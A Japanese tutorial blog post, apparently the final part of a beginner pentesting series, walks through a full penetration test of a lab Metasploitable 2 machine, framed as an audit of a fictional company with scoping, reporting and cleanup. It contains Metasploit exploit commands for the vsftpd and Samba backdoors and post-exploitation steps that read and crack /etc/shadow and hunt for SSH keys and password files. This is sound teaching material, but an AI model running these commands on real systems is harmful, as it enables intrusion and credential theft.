完全監査：最初から最後まで完全なペネトレーションテスト

ハッカーの道：5部構成シリーズ

パート1：入門 → パート2：Flipperの習得 → パート3：Kaliの基礎 → パート4：エクスプロイト → パート5：完全監査

このシリーズを、ハッカーが実際に何をしているのか疑問に思いながら始めました。フードとグリーンテキストの話ではないことを学びました。体系的な問題解決です。バッジをクローンし、ネットワークをマッピングし、ハンドシェイクをキャプチャし、脆弱なマシンでシェルを取得しました。

今、すべてをまとめます。この記事では、架空のターゲットに対する完全なペネトレーションテストを案内します。すべてのフェーズ、すべての判断、すべての発見を、プロフェッショナルがやるのとまったく同じように文書化します。

シナリオ

クライアント: Initech Labs（架空の小規模テック企業）

範囲: 内部ネットワークペネトレーションテスト

目標: 脆弱性を特定し、潜在的なビジネスインパクトを実証する

あなたのターゲット: 自分のラボネットワーク（Kali + Metasploitable 2 + 設定した他のVM）

コーヒーを用意しましょう。楽しくなります。

フェーズ1：事前準備

キーボードに触れる前に、プロのペンテスターはビジネス面を処理します。これを飛ばせば、あなたはペンテスターではありません。ただ犯罪を犯している人です。

スコーピングコール

実際の契約では、クライアントと電話して以下を理解します：

• 範囲内は何か？ どのネットワーク、IPレンジ、アプリケーション？
• 範囲外は何か？ 本番システム？サードパーティサービス？
• テスト窓口？ いつテストできるか？営業時間のみ？
• 連絡先は？ 何か壊れたら誰に電話する？
• 目標は？ コンプライアンスのチェックボックスか、実際のセキュリティ改善か？

ラボ用

範囲： 隔離されたラボネットワークのみ。範囲外： 地球上のそれ以外すべて。テスト窓口： いつでも。目標： 実践による学習。

エンゲージメントルール

実際の契約には書面のルールがあります：

• 認可書 - 許可を証明する署名入り文書
• エスカレーション手順 - 重大なものを発見した場合の対応
• データ取り扱い - 遭遇する機密データの処理方法
• クリーンアップ要件 - 完了時にすべてのツールとバックドアを削除
• レポート期限 - 最終レポートの提出期限

フェーズ2：偵察

ターゲットについてすべてを学ぶ時間です。実際の契約では、OSINT（オープンソースインテリジェンス）が含まれます：Google検索、LinkedInプロフィール、企業ウェブサイト、DNSレコード。ラボでは、アクティブ偵察に直接進みます。

ステップ1：ネットワーク発見

最初の質問：このネットワークには何がある？

bash# ネットワーク範囲を見つける
ip a | grep inet
# 次のようなものを探す: inet 192.168.56.100/24

# すべてのライブホストを発見
sudo nmap -sn 192.168.56.0/24 -oA discovery

# 結果（例）:
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).

すべてを文書化します：

text# Initech Labs - ネットワーク発見
# 日付: 2026-03-08
# テスター: あなたの名前

192.168.56.1   - ゲートウェイ/ルーター
192.168.56.101 - 不明（要調査）
192.168.56.102 - 不明（要調査）

ステップ2：ポートスキャン

さらに深く掘り下げます。どのサービスが動いている？

bash# サービス検出付き全ポートスキャン
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101

# 学習中はより高速な結果のために:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

Metasploitable 2では、宝の山が見えます：

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

すごい露出量です。ノートを更新しましょう：

text192.168.56.101 - Linuxサーバー (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # 既知のバックドア！
  - SSH (22): OpenSSH 4.7p1      # 古代
  - Telnet (23): アクティブ        # 2026年になぜこれが存在する？
  - HTTP (80): Apache 2.2.8      # テスト対象のWebアプリ
  - SMB (139/445): Samba 3.X     # 潜在的な金鉱
  - MySQL (3306): 5.0.51a        # データベースアクセス？
  - PostgreSQL (5432): アクティブ  # 別のDB

ステップ3：脆弱性特定

実際に何がエクスプロイト可能か見てみましょう。

bash# 脆弱性スクリプトを実行
sudo nmap --script vuln -oA vuln_scan 192.168.56.101

# Metasploitで特定のサービスを確認
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2

vsftpd 2.3.4のバックドアがすぐに目に飛び込みます。確実なシェルです。しかし良いペンテスターは最初の発見で止まりません。すべてを文書化します。

フェーズ3：エクスプロイト

ここからが面白くなります。複数の潜在的な侵入ポイントがあります。体系的に作業しましょう。

攻撃ベクター1：FTPバックドア

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root

id
uid=0(root) gid=0(root)

文書化された発見： FTPバックドア経由でrootシェルを取得。最初のスキャンから完全な侵害まで約10分。

しかしここで止まりません。他に何にアクセスできる？

攻撃ベクター2：Samba

bashbackground

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

whoami
root

別のベクターからもう一つのrootシェル。完全侵害への2つの独立した経路。

攻撃ベクター3：Webアプリケーション

ポート80で何が動いているか見ましょう。

bashgobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt

nikto -h http://192.168.56.101

デフォルト認証情報のphpMyAdmin？確認しましょう：

textUsername: root
Password: (空白)

# アクセス許可！

パスワードなしでデータベース管理者アクセス。ここから、すべてのデータをダンプし、レコードを変更し、MySQLのファイル操作でWebシェルを書くことができます。

攻撃ベクター4：弱いSSH認証情報

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

弱い認証情報でSSHアクセスを取得。rootではありませんが、ポストエクスプロイトで対処します。

フェーズ4：ポストエクスプロイト

アクセスを得ました。次は？実際のペネトレーションテストはビジネスインパクトを実証します。

認証情報の収集

bashcat /etc/shadow
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt

unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

内部からのネットワーク偵察

bashifconfig
route -n
cat /etc/hosts
arp -a
netstat -tulpn
find / -name "id_rsa" 2>/dev/null

機密データの発見

bashfind / -name "*.conf" 2>/dev/null | head -20
find / -name "*password*" 2>/dev/null
cat /var/www/*/config.php 2>/dev/null

mysql -u root -p
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;

権限昇格（msfadminから）

bashssh [email protected]
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab

フェーズ5：文書化と発見事項

レポートなしでテストは無意味です。プロフェッショナルとスクリプトキディを分けるのはこれです。

発見事項の要約

"Initech Labs"ネットワークで発見したもの：

クリティカル：FTPサービスバックドア（CVE-2011-2523）

影響を受けるシステム： 192.168.56.101

リスク： rootとしての非認証リモートコード実行

証拠： 60秒未満で完全なrootシェルを取得

推奨事項： vsftpdを直ちに更新するか、FTPサービスを完全に無効化

クリティカル：Sambaリモートコード実行

影響を受けるシステム： 192.168.56.101

推奨事項： Sambaを更新。SMBアクセスを必要なシステムのみに制限

高：パスワードなしのMySQL Rootアクセス

影響を受けるシステム： 192.168.56.101

推奨事項： 強力なrootパスワードを設定。phpMyAdminアクセスを制限

高：弱いSSH認証情報

推奨事項： 強力なパスワードポリシーを実施。SSH鍵ベース認証を実装

中：Telnetサービスが有効

推奨事項： Telnetを無効化。すべてのリモート管理にSSHを使用

低：公開されたphpinfo()ページ

推奨事項： phpinfoページを削除またはアクセスを制限

エグゼクティブサマリー

Initech Labsの内部ネットワークペネトレーションテスト中、セキュリティチームは評価開始から10分以内にメインサーバーの完全な管理制御を獲得しました。

• 即座のリモート乗っ取りを可能にする2つのクリティカルな脆弱性
• データベースとユーザー認証情報を露出する2つの高リスク問題
• 体系的なセキュリティギャップを示す複数の中低リスクの発見事項

結論： 基本的なスキルを持つ攻撃者がこのシステムを数分で完全に侵害できます。すべてのクリティカルおよび高リスクの発見事項に対する即時の修正が必要です。

フェーズ6：クリーンアップと完了

プロのペンテスターは環境を見つけたとおりに残します。

bashmsf6 > sessions -l
msf6 > sessions -K
rm /tmp/linpeas.sh
rm /tmp/*.txt
userdel testuser
rm /home/*/.ssh/authorized_keys

完全な方法論チェックリスト

ペネトレーションテスト方法論

1. 事前準備 - 範囲とルールの定義、書面の認可取得、環境セットアップ
2. 偵察 - ネットワーク発見、ポートスキャン、脆弱性スキャン、すべてを文書化
3. エクスプロイト - 脆弱性の検証、確認された脆弱性の悪用、証拠のキャプチャ
4. ポストエクスプロイト - 認証情報収集、機密データ特定、権限昇格
5. レポート - エグゼクティブサマリー、発見事項の文書化、修正推奨事項
6. クリーンアップ - ツール削除、セッション終了、変更の文書化

次のステップ：あなたの道

ハッカーの道を完了しました。「ハッキングとは何か？」から完全なペネトレーションテストの実施までたどり着きました。本当に素晴らしいことです。

しかしこれは始まりに過ぎません：

練習プラットフォーム

• Hack The Box - リアルなマシン。引退した「Easy」ボックスから始めましょう。
• TryHackMe - ガイド付き学習パス。
• VulnHub - ローカル練習用の無料脆弱VM。
• PentesterLab - Webアプリケーションセキュリティに特化。

資格（希望する場合）

• eJPT - 優れた出発点、実践的試験
• OSCP - 業界標準、厳しいが尊敬される
• PNPT - 現代的、実践的、レポート作成を含む
• CEH - 企業要件向け、実践性は低い

専門分野

• Webアプリケーションセキュリティ - OWASP, Burp Suite, SQLインジェクション, XSS
• Active Directory - ほとんどの企業環境で使用
• クラウドセキュリティ - AWS, Azure, GCPペンテスト
• モバイルセキュリティ - Android/iOSアプリテスト
• Red Teaming - 物理+デジタルの完全な敵対者シミュレーション
• リバースエンジニアリング - マルウェア分析、エクスプロイト開発

ホームラボを構築する

• Active Directory付きWindows Serverを追加
• ドメインコントローラーをセットアップ
• 脆弱なWebアプリケーションをデプロイ（DVWA, bWAPP, WebGoat）
• 複数セグメントのネットワークを構築
• 防御者の視点から攻撃を見るためにHoneyAegisを追加

ハッカーの道：完了

やりました。5つのパートすべて、好奇心から能力へ。

パート1：入門 パート2：Flipperの習得 パート3：Kaliの基礎 パート4：エクスプロイト パート5：完全監査

シリーズ完了 - あなたの旅

パート1： ハッキングの本質を学び、Flipper Zeroで最初の成果を得た

パート2： すべてのFlipperプロトコルを習得：Sub-GHz, RFID, NFC, BadUSB, GPIO

パート3： Kaliラボを構築し、nmapを学び、WiFiハンドシェイクをキャプチャした

パート4： Metasploit、エクスプロイト、権限昇格、ピボットを習得した

パート5： すべてを完全なペネトレーションテスト方法論にまとめた

セキュリティは目的地ではありません。実践です。ツールは変わり、脆弱性は進化しますが、方法論は同じです。すべてを疑問視する。すべてを文書化する。学ぶことを止めない。

反対側へようこそ。

• Lee